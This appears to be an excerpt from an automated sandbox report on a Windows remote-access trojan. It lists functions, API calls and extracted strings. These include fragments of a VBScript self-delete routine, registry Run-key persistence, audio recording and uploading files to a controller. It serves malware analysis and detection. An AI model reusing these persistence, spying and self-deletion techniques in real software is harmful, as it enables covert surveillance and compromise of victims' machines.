                                                          • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                          • String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                          • API String ID: 1861856835-3168347843
                                                          • Opcode ID: 1fca09a02b8493e53294f51d4634f72964b40bbef437048ec22e150e28ca3ccf
                                                          • Instruction ID: c8b5e11b4abf5c95f8ab28b2bb359051ef64700817c412cd349ec45860bdb676
                                                          • Opcode Fuzzy Hash: 1fca09a02b8493e53294f51d4634f72964b40bbef437048ec22e150e28ca3ccf
                                                          • Instruction Fuzzy Hash: EB9175316042005AC314FB25D852ABF7799AF91718F10453FF98A631E2EF7CAD49C69E
                                                          Function 0040BF04 Relevance: 40.5, APIs: 6, Strings: 17, Instructions: 260registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                            • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                            • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,00000000,?,0040C2B0,?,00000000), ref: 0040AFC9
                                                            • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                            • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,0040C2B0,?,00000000), ref: 0040AFE3
                                                            • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB5F
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                          • ExitProcess.KERNEL32 ref: 0040C287
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                          • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                          • API String ID: 3797177996-1998216422
                                                          • Opcode ID: c4cc4d00899e4284936be169aaff6719d95b62d3fffb22ecd15678fbb4326d45
                                                          • Instruction ID: 1063ce1f4075510d90626cdc8b34ac690c3cf2dc76fa2c9c3337a4c1feab76e8
                                                          • Opcode Fuzzy Hash: c4cc4d00899e4284936be169aaff6719d95b62d3fffb22ecd15678fbb4326d45
                                                          • Instruction Fuzzy Hash: B78191316042005BC315FB21D862ABF77A9ABD1308F10453FF586A71E2EF7CAD49869E
                                                          Function 0041A1BB Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
                                                          • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
                                                          • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A2FF
                                                          • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A340
                                                          • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A358
                                                          • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A36D
                                                          • SetEvent.KERNEL32 ref: 0041A38A
                                                          • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
                                                          • CloseHandle.KERNEL32 ref: 0041A3AB
                                                          • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3CD
                                                          • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3D7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                          • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                          • API String ID: 738084811-1408154895
                                                          • Opcode ID: c362ced5fa98a12e984468584ff4096b6ed47b7628e845a56c9a339ad7c4d382
                                                          • Instruction ID: 9d48d6c6e0579c1e833a8367b0d02802659df9f73890df0c3e8ff2b6504ede8e
                                                          • Opcode Fuzzy Hash: c362ced5fa98a12e984468584ff4096b6ed47b7628e845a56c9a339ad7c4d382
                                                          • Instruction Fuzzy Hash: 9A51C2712443056AD214BB31DC82EBF3B5CEB91758F10043FF455A21E2EE389D9986AF
                                                          Function 00401BE8 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                          • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                          • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                          • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                          • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                          • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                          • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                          • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                          • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                          • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Write$Create
                                                          • String ID: RIFF$WAVE$data$fmt
                                                          • API String ID: 1602526932-4212202414
                                                          • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                          • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                          • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                          • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
                                                          Function 004064E0 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,00000001,004068B2,C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                          • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                          • API String ID: 1646373207-3272542945
                                                          • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                          • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                          • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                          • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                                          Function 0040BC67 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 203fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _wcslen.LIBCMT ref: 0040BC75
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                          • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                          • _wcslen.LIBCMT ref: 0040BD54
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                          • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,00000000,00000000), ref: 0040BDF2
                                                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                          • _wcslen.LIBCMT ref: 0040BE34
                                                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                          • ExitProcess.KERNEL32 ref: 0040BED0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                          • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$del$open$BG$BG
                                                          • API String ID: 1579085052-3709896694
                                                          • Opcode ID: 8a4e8abcb5692669c638f214cb972068405fdb8eb26e88a62148626bb00c57e2
                                                          • Instruction ID: b3868b96a5a73c1b880f625a38b4c220dd420420d05b0a2cc1e840e3cd02b35d
                                                          • Opcode Fuzzy Hash: 8a4e8abcb5692669c638f214cb972068405fdb8eb26e88a62148626bb00c57e2
                                                          • Instruction Fuzzy Hash: D251B0212043406BD609B722EC52EBF77999F81719F10443FF985A66E2DF3CAD4582EE
                                                          Function 0041B1BB Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(?), ref: 0041B1D6
                                                          • _memcmp.LIBVCRUNTIME ref: 0041B1EE
                                                          • lstrlenW.KERNEL32(?), ref: 0041B207
                                                          • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B255
                                                          • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
                                                          • lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
                                                          • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
                                                          • _wcslen.LIBCMT ref: 0041B2DB
                                                          • FindVolumeClose.KERNEL32(?), ref: 0041B2FB
                                                          • GetLastError.KERNEL32 ref: 0041B313
                                                          • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
                                                          • lstrcatW.KERNEL32(?,?), ref: 0041B359
                                                          • lstrcpyW.KERNEL32(?,?), ref: 0041B368
                                                          • GetLastError.KERNEL32 ref: 0041B370
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                          • String ID: ?
                                                          • API String ID: 3941738427-1684325040
                                                          • Opcode ID: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
                                                          • Instruction ID: 2e0df54dd889987763cd5022c3700ac4418931210c184d5857636408485aa128
                                                          • Opcode Fuzzy Hash: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
                                                          • Instruction Fuzzy Hash: 8B416F71508305AAD7209FA1EC8C9EBB7E8EB49715F00096BF541C2261EB78C98887D6
                                                          Function 0044E20E Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$EnvironmentVariable$_wcschr
                                                          • String ID:
                                                          • API String ID: 3899193279-0
                                                          • Opcode ID: f97f98dd34153332c2010fb65b1131a463ec8f76e6cba2d9c1c767644d430276
                                                          • Instruction ID: 8ac3cd9939a067627e1c481289c57a7f9f94b657261427fab31af25724b0c78e
                                                          • Opcode Fuzzy Hash: f97f98dd34153332c2010fb65b1131a463ec8f76e6cba2d9c1c767644d430276
                                                          • Instruction Fuzzy Hash: 96D13C719007007FFB25AF7B9881A6F7BA4BF02314F0541AFF905A7381E63989418B9D
                                                          Function 00411C81 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 479sleepfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                            • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB5F
                                                            • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                            • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                          • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                          • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                          • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                          • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                          • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                          • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                          • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                          • Sleep.KERNEL32(00000064), ref: 00412060
                                                            • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                          • String ID: /stext "$HDG$HDG$>G$>G
                                                          • API String ID: 1223786279-3931108886
                                                          • Opcode ID: 36ecec2bd287229840889fa2f21ce4d309759ff1e99f2e4f361d0ee51ee9b760
                                                          • Instruction ID: 1febf249a593eb43810efab42e14b6693ac358e03ba90545e56d33427da79e18
                                                          • Opcode Fuzzy Hash: 36ecec2bd287229840889fa2f21ce4d309759ff1e99f2e4f361d0ee51ee9b760
                                                          • Instruction Fuzzy Hash: 960243315083414AC325FB61D891AEFB7D5AFD4308F50493FF88A931E2EF785A49C69A
                                                          Function 00413E37 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                          • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                          • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                          • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                          • API String ID: 2490988753-744132762
                                                          • Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                          • Instruction ID: a4547f3d416e9253f7b1cbdd0907a67efdadb69b2b53743d1710677937ed8fa2
                                                          • Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                          • Instruction Fuzzy Hash: 6D31C4B1906315A7D320AF25DC44ACBB7ECEF44745F400A2AF844D3201D778DA858AEE
                                                          Function 0041B824 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B846
                                                          • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B88A
                                                          • RegCloseKey.ADVAPI32(?), ref: 0041BB54
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseEnumOpen
                                                          • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                          • API String ID: 1332880857-3714951968
                                                          • Opcode ID: c129c5d3b2225b1f8cda05c9a3a6c18510288d4317852ec5d704d9b0c7986d58
                                                          • Instruction ID: 4ca6cd9db44c7b11bab16217f2b7ba144dfc64e74838f3250c32f9e768a6938f
                                                          • Opcode Fuzzy Hash: c129c5d3b2225b1f8cda05c9a3a6c18510288d4317852ec5d704d9b0c7986d58
                                                          • Instruction Fuzzy Hash: 8C812E311082449BD324EB11DC51AEFB7E9FFD4314F10493FB58A921E1EF74AA49CA9A
                                                          Function 0041CA9E Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 73windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAE9
                                                          • GetCursorPos.USER32(?), ref: 0041CAF8
                                                          • SetForegroundWindow.USER32(?), ref: 0041CB01
                                                          • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
                                                          • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB6C
                                                          • ExitProcess.KERNEL32 ref: 0041CB74
                                                          • CreatePopupMenu.USER32 ref: 0041CB7A
                                                          • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB8F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                          • String ID: Close
                                                          • API String ID: 1657328048-3535843008
                                                          • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                          • Instruction ID: a66ed96c0d91d71762f770de87d5f41dd37c70c4e97b210e23d221b2b7ccacbc
                                                          • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                          • Instruction Fuzzy Hash: 68212B71188209FFDB064F64FD4EAAA3F65EB04342F044135B906D40B2D7B9EA90EB18
                                                          Function 00444F3D Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$Info
                                                          • String ID:
                                                          • API String ID: 2509303402-0
                                                          • Opcode ID: 06a8a26f2c5a7b5fa394c6bff13e2c454eae2c5b2dbf51852f12c512b58d3eba
                                                          • Instruction ID: 0af7f9009007d8880989bd470fdb3e4a62bb8e65dbd2af1b74ff5c8893cb1db7
                                                          • Opcode Fuzzy Hash: 06a8a26f2c5a7b5fa394c6bff13e2c454eae2c5b2dbf51852f12c512b58d3eba
                                                          • Instruction Fuzzy Hash: D0B18F71900605AFEF11DFA9C881BEEBBF4BF49304F14406EF855B7242DA79A8458B64
                                                          Function 00407DEF Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 325fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                          • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                          • __aulldiv.LIBCMT ref: 00407FE9
                                                          • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                          • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                          • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                          • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                          • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                          • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                          • API String ID: 1884690901-3066803209
                                                          • Opcode ID: 7205d9af98df91b965123a054d585fa7c0d52e82773df9d6c890248cdbc6b411
                                                          • Instruction ID: 222450ca6543349723abdfa1177da379b39b5876d7444fbb960ea0ab75079841
                                                          • Opcode Fuzzy Hash: 7205d9af98df91b965123a054d585fa7c0d52e82773df9d6c890248cdbc6b411
                                                          • Instruction Fuzzy Hash: DAB191316083409BC214FB25C892AAFB7E5AFD4314F40492EF885632D2EF789945C79B
                                                          Function 00409E48 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Sleep.KERNEL32(00001388), ref: 00409E62
                                                            • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                            • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                            • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                            • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                          • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                          • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                          • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                            • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                          • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,00000000,00000000,00000000), ref: 0040A049
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                          • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                          • API String ID: 3795512280-3163867910
                                                          • Opcode ID: 859471ff5ae44976aba126b0bcf56bf0f182264686a8061ac70fe12e31261d66
                                                          • Instruction ID: b7dfc09a395f5416f32c5fe597dbb364f69b6ed32616efff49b152d1c9b912f4
                                                          • Opcode Fuzzy Hash: 859471ff5ae44976aba126b0bcf56bf0f182264686a8061ac70fe12e31261d66
                                                          • Instruction Fuzzy Hash: 30518D716043005ACB05BB72D866ABF769AAFD1309F00053FF886B71E2DF3D9D44869A
                                                          Function 0045006D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • ___free_lconv_mon.LIBCMT ref: 004500B1
                                                            • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
                                                            • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
                                                            • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
                                                            • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
